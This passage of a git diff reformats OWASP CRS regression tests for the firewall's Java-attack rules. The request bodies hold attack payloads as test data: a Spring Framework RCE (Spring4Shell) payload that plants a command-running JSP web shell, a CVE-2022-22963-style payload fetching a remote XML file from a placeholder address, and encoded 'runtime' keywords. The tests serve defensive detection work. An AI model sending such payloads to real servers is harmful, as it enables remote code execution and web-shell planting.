"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.evil.processbuilder" - output: - log_contains: "id \"944250\"" - - test_title: 944250-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.evil.processbuilder" + output: + log: + expect_ids: [944250] + - test_id: 21 desc: 
"Content-Type application/json arg value includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.evil.processbuilder\"}" - output: - log_contains: "id \"944250\"" - - test_title: 944250-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.evil.processbuilder\"}" + output: + log: + expect_ids: [944250] + - test_id: 22 desc: "Content-Type application/json arg name includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.evil.processbuilder\": \"test\"}" - output: - log_contains: "id \"944250\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.evil.processbuilder\": \"test\"}" + output: + log: + expect_ids: [944250] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml index 144d3f52a..d6a8d28e8 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml 
@@ -1,41 +1,39 @@ --- meta: author: "theMiddle, azurit" - enabled: true - name: "944260.yaml" - description: "Positive tests for rule 944260" +rule_id: 944260 tests: - - test_title: 944260-1 + - test_id: 1 desc: "CVE-2022-22963" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.1" - data: "_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://127.1.2.3/wb.xml')" - output: - log_contains: "id \"944260\"" - - test_title: 944260-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.1" + data: "_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://127.1.2.3/wb.xml')" + output: + log: + expect_ids: [944260] + - test_id: 2 desc: "Spring Framework RCE" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.1" - data: 
"class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" - output: - log_contains: "id \"944260\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.1" + data: "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" + output: + log: + expect_ids: [944260] 
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml index 412a3b686..9ab732eb5 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml 
@@ -1,6697 +1,6605 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944300.yaml" - description: "Positive tests for rule 944300" +rule_id: 944300 tests: - - test_title: 944300-1 + - test_id: 1 desc: "Argument test includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cnVudGltZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cnVudGltZQ" + output: + log: + expect_ids: [944300] + - test_id: 2 desc: "Argument name includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cnVudGltZQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cnVudGltZQ=test" + output: + log: + expect_ids: [944300] + - test_id: 3 desc: "Cookie test includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=cnVudGltZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cnVudGltZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 4 desc: "Cookie name includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: cnVudGltZQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 
944300-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cnVudGltZQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 5 desc: "Request header test includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: cnVudGltZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cnVudGltZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 6 desc: "XML attribute value includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: 
"HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 7 desc: "XML element value includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cnVudGltZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cnVudGltZQ" + output: + log: + expect_ids: [944300] + - test_id: 8 desc: "Nested XML element value includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - 
uri: "/post" - version: "HTTP/1.0" - data: "cnVudGltZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cnVudGltZQ" + output: + log: + expect_ids: [944300] + - test_id: 9 desc: "Content-Type text/plain includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cnVudGltZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cnVudGltZQ" + output: + log: + expect_ids: [944300] + - test_id: 10 desc: "Content-Type application/json arg value includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"cnVudGltZQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"cnVudGltZQ\"}" + output: + log: + expect_ids: [944300] + - test_id: 11 desc: "Content-Type application/json arg name includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"cnVudGltZQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"cnVudGltZQ\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 12 desc: "Argument test includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HJ1bnRpbWU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HJ1bnRpbWU" + output: + log: + expect_ids: [944300] + - test_id: 13 desc: "Argument name includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HJ1bnRpbWU=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HJ1bnRpbWU=test" + output: + log: + expect_ids: [944300] + - test_id: 14 desc: "Cookie test includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: 
"127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HJ1bnRpbWU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HJ1bnRpbWU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 15 desc: "Cookie name includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HJ1bnRpbWU=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HJ1bnRpbWU=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + 
output: + log: + expect_ids: [944300] + - test_id: 16 desc: "Request header test includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HJ1bnRpbWU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HJ1bnRpbWU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 17 desc: "XML attribute value includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + 
method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 18 desc: "XML element value includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HJ1bnRpbWU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HJ1bnRpbWU" + output: + log: + expect_ids: [944300] + - test_id: 19 desc: "Nested XML element value includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HJ1bnRpbWU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HJ1bnRpbWU" + output: + log: + expect_ids: [944300] + - test_id: 20 desc: "Content-Type text/plain includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HJ1bnRpbWU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HJ1bnRpbWU" + output: + log: + expect_ids: [944300] + - test_id: 21 desc: "Content-Type application/json arg value includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"HJ1bnRpbWU\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
